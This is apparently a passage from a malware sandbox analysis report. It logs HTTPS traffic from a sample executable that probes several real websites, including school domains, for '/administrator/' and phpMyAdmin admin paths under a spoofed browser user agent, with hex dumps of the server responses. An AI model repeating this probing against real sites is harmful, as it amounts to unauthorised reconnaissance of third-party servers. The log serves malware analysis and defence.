                                                                                                                                                                                                    2023-11-26 05:59:32 UTC166INData Raw: 62 33 31 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63
                                                                                                                                                                                                    Data Ascii: b31 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-sc
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC1252INData Raw: 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20
                                                                                                                                                                                                    Data Ascii: ale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width">
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC1252INData Raw: 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39
                                                                                                                                                                                                    Data Ascii: vices/third-party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC207INData Raw: 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    81192.168.2.456382162.144.64.2334436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC177OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: tcetmumbai.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC166INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 37 36 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTServer: ApacheAccept-Ranges: bytesContent-Length: 764Connection: closeContent-Type: text/html
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC764INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 68 31 7b 0d 0a 66 6f 6e 74 2d 73 69 7a 65 3a 38 30 70 78 3b 0d 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 38 30 30 3b 0d 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 7d 0d 0a 68 32 0d 0a 7b 0d 0a 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b
                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Error</title><link href="https://fonts.googleapis.com/css?family=Roboto:700" rel="stylesheet"><style>h1{font-size:80px;font-weight:800;text-align:center;font-family: 'Roboto', sans-serif;}h2{font-size:25px;


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    82192.168.2.45663067.205.16.724436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: capforge.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC512INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 62 69 64 3d 31 65 64
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://capforge.com/wp-json/>; rel="https://api.w.org/"Set-Cookie: pbid=1ed
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC6INData Raw: 64 35 35 34 0d 0a
                                                                                                                                                                                                    Data Ascii: d554
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC7800INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 69 74 65 6d 73 63 6f 70 65 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e
                                                                                                                                                                                                    Data Ascii: <!doctype html><html dir="ltr" lang="en-US" prefix="og: https://ogp.me/ns#" class="no-js" itemtype="https://schema.org/WebPage" itemscope><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1"><lin
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC8192INData Raw: 72 65 73 73 50 6c 75 67 69 6e 5c 2f 6c 69 62 5c 2f 63 73 73 5c 2f 22 7d 2c 22 73 6f 63 69 61 6c 22 3a 7b 22 74 77 69 74 74 65 72 22 3a 22 6f 70 74 69 6d 69 7a 65 70 72 65 73 73 22 2c 22 66 61 63 65 62 6f 6f 6b 22 3a 22 6f 70 74 69 6d 69 7a 65 70 72 65 73 73 22 2c 22 67 6f 6f 67 6c 65 70 6c 75 73 22 3a 22 31 31 31 32 37 33 34 34 34 37 33 33 37 38 37 33 34 39 39 37 31 22 7d 2c 22 66 6c 6f 77 70 6c 61 79 65 72 48 54 4d 4c 35 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 5c 2f 77 70 2d 63 6f 6e 74 65 6e 74 5c 2f 70 6c 75 67 69 6e 73 5c 2f 6f 70 74 69 6d 69 7a 65 50 72 65 73 73 50 6c 75 67 69 6e 5c 2f 6c 69 62 5c 2f 6d 6f 64 75 6c 65 73 5c 2f 62 6c 6f 67 5c 2f 76 69 64 65 6f 5c 2f 66 6c 6f 77 70 6c 61 79 65 72 5c 2f 66 6c 6f 77 70
                                                                                                                                                                                                    Data Ascii: ressPlugin\/lib\/css\/"},"social":{"twitter":"optimizepress","facebook":"optimizepress","googleplus":"111273444733787349971"},"flowplayerHTML5":"https:\/\/capforge.com\/wp-content\/plugins\/optimizePressPlugin\/lib\/modules\/blog\/video\/flowplayer\/flowp
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC8192INData Raw: 65 2d 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 6f 72 73 20 65 6c 65 6d 65 6e 74 6f 72 2d 64 65 66 61 75 6c 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 6b 69 74 2d 32 31 31 38 22 3e 3c 64 69 76 20 69 64 3d 22 77 72 61 70 70 65 72 22 20 63 6c 61 73 73 3d 22 73 69 74 65 20 77 70 2d 73 69 74 65 2d 62 6c 6f 63 6b 73 22 3e 20 3c 61 20 63 6c 61 73 73 3d 22 73 6b 69 70 2d 6c 69 6e 6b 20 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 20 73 63 72 6f 6c 6c 2d 69 67 6e 6f 72 65 22 20 68 72 65 66 3d 22 23 6d 61 69 6e 22 3e 53 6b 69 70 20 74 6f 20 63 6f 6e 74 65 6e 74 3c 2f 61 3e 3c 68 65 61 64 65 72 20 69 64 3d 22 6d 61 73 74 68 65 61 64 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 68 65 61 64 65 72 22 20 72 6f 6c 65 3d 22 62 61 6e 6e 65 72 22 20 69 74 65 6d 74 79 70 65 3d
                                                                                                                                                                                                    Data Ascii: e-elementor-colors elementor-default elementor-kit-2118"><div id="wrapper" class="site wp-site-blocks"> <a class="skip-link screen-reader-text scroll-ignore" href="#main">Skip to content</a><header id="masthead" class="site-header" role="banner" itemtype=
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC8192INData Raw: 74 65 6d 2d 6f 62 6a 65 63 74 2d 63 61 74 65 67 6f 72 79 20 6d 65 6e 75 2d 69 74 65 6d 2d 37 31 33 33 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 2f 63 61 74 65 67 6f 72 79 2f 64 65 6e 74 61 6c 2d 70 72 61 63 74 69 63 65 2d 74 69 70 73 2f 22 3e 44 65 6e 74 61 6c 20 50 72 61 63 74 69 63 65 20 54 69 70 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 37 31 33 34 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 74 61 78 6f 6e 6f 6d 79 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 63 61 74 65 67 6f 72 79 20 6d 65 6e 75 2d 69 74 65 6d 2d 37 31 33 34 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 70 66
                                                                                                                                                                                                    Data Ascii: tem-object-category menu-item-7133"><a href="https://capforge.com/category/dental-practice-tips/">Dental Practice Tips</a></li><li id="menu-item-7134" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7134"><a href="https://capf
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC8192INData Raw: 30 36 20 32 2d 32 20 32 2d 30 2e 35 33 31 20 30 2d 31 2e 30 34 37 2d 30 2e 32 31 39 2d 31 2e 34 30 36 2d 30 2e 35 39 34 6c 2d 35 2e 33 35 39 2d 35 2e 33 34 34 63 2d 31 2e 38 32 38 20 31 2e 32 36 36 2d 34 2e 30 31 36 20 31 2e 39 33 37 2d 36 2e 32 33 34 20 31 2e 39 33 37 2d 36 2e 30 37 38 20 30 2d 31 31 2d 34 2e 39 32 32 2d 31 31 2d 31 31 73 34 2e 39 32 32 2d 31 31 20 31 31 2d 31 31 20 31 31 20 34 2e 39 32 32 20 31 31 20 31 31 63 30 20 32 2e 32 31 39 2d 30 2e 36 37 32 20 34 2e 34 30 36 2d 31 2e 39 33 37 20 36 2e 32 33 34 6c 35 2e 33 35 39 20 35 2e 33 35 39 63 30 2e 33 35 39 20 30 2e 33 35 39 20 30 2e 35 37 38 20 30 2e 38 37 35 20 30 2e 35 37 38 20 31 2e 34 30 36 7a 22 3e 3c 2f 70 61 74 68 3e 20 3c 2f 73 76 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 2f
                                                                                                                                                                                                    Data Ascii: 06 2-2 2-0.531 0-1.047-0.219-1.406-0.594l-5.359-5.344c-1.828 1.266-4.016 1.937-6.234 1.937-6.078 0-11-4.922-11-11s4.922-11 11-11 11 4.922 11 11c0 2.219-0.672 4.406-1.937 6.234l5.359 5.359c0.359 0.359 0.578 0.875 0.578 1.406z"></path> </svg></span></div></
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC8192INData Raw: 2d 68 65 61 64 65 72 2d 66 6f 63 75 73 2d 69 74 65 6d 20 73 69 74 65 2d 68 65 61 64 65 72 2d 69 74 65 6d 2d 6d 6f 62 69 6c 65 2d 6e 61 76 69 67 61 74 69 6f 6e 20 6d 6f 62 69 6c 65 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 61 79 6f 75 74 2d 73 74 72 65 74 63 68 2d 66 61 6c 73 65 22 20 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 6b 61 64 65 6e 63 65 5f 63 75 73 74 6f 6d 69 7a 65 72 5f 6d 6f 62 69 6c 65 5f 6e 61 76 69 67 61 74 69 6f 6e 22 3e 3c 6e 61 76 20 69 64 3d 22 6d 6f 62 69 6c 65 2d 73 69 74 65 2d 6e 61 76 69 67 61 74 69 6f 6e 22 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 6e 61 76 69 67 61 74 69 6f 6e 20 64 72 61 77 65 72 2d 6e 61 76 69 67 61 74 69 6f 6e 20 64 72 61 77 65 72 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 70 61 72 65 6e 74 2d 74 6f 67 67 6c 65 2d 74
                                                                                                                                                                                                    Data Ascii: -header-focus-item site-header-item-mobile-navigation mobile-navigation-layout-stretch-false" data-section="kadence_customizer_mobile_navigation"><nav id="mobile-site-navigation" class="mobile-navigation drawer-navigation drawer-navigation-parent-toggle-t
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC5848INData Raw: 61 78 2e 70 68 70 22 2c 22 61 63 74 69 6f 6e 22 3a 22 63 6f 6e 76 65 72 74 6b 69 74 5f 62 72 6f 61 64 63 61 73 74 73 5f 72 65 6e 64 65 72 22 2c 22 64 65 62 75 67 22 3a 22 22 7d 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 76 65 72 74 6b 69 74 2f 72 65 73 6f 75 72 63 65 73 2f 66 72 6f 6e 74 65 6e 64 2f 6a 73 2f 62 72 6f 61 64 63 61 73 74 73 2e 6a 73 3f 76 65 72 3d 32 2e 33 2e 37 22 20 69 64 3d 22 63 6f 6e 76 65 72 74 6b 69 74 2d 62 72 6f 61 64 63 61 73 74 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 2f
                                                                                                                                                                                                    Data Ascii: ax.php","action":"convertkit_broadcasts_render","debug":""};</script> <script src="https://capforge.com/wp-content/plugins/convertkit/resources/frontend/js/broadcasts.js?ver=2.3.7" id="convertkit-broadcasts-js"></script> <script src="https://capforge.com/
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC4INData Raw: 74 6d 6c 3e
                                                                                                                                                                                                    Data Ascii: tml>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    83192.168.2.456356116.202.203.1764436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC178OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: eco-landeck.at
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC565INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 33 34 39 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 37 20 41 75 67 20 32 30 30 35 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:32 GMTContent-Type: text/html; charset=utf-8Content-Length: 13491Connection: closeX-Frame-Options: SAMEORIGINExpires: Wed, 17 Aug 2005 00:00:00 GMTCache-Control: no-store, no-cache,
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC13491INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 64 65 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 48 41 4b 20 48 4c 57 20 4c 61 6e 64 65 63 6b 2c 20 57 65 62 73 69 74 65 20 64 65 72 20 48 61 6e 64 65 6c 73 61 6b 61 64 65 6d 69 65 2c 20 64 65 72 20 4d 65 64 69 61 68 61 6b 20 4c 61 6e 64 65 63 6b 20 75 6e 64
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="de-de" dir="ltr"><head> <meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="HAK HLW Landeck, Website der Handelsakademie, der Mediahak Landeck und


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    84192.168.2.456066120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC253OUTGET /saml/index.php?page=%2Fphpmyadmin%2F HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=unid3p469s9hj2a6pka8sch23r
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1085INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTPragma: no-cacheCache-Control: no-cache, must-revalida
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    85192.168.2.456608104.26.7.374436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC206OUTGET /domain_profile.cfm?d=robinsonland.com HTTP/1.1
                                                                                                                                                                                                    Host: www.hugedomains.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC808INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 73 69 74 65 5f 76 65 72 73 69 6f 6e 5f 70 68 61 73 65 3d 31 30 38 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 32 30 2d 4e 6f 76 2d 32 30 32 34 20 30 35 3a 35 39 3a
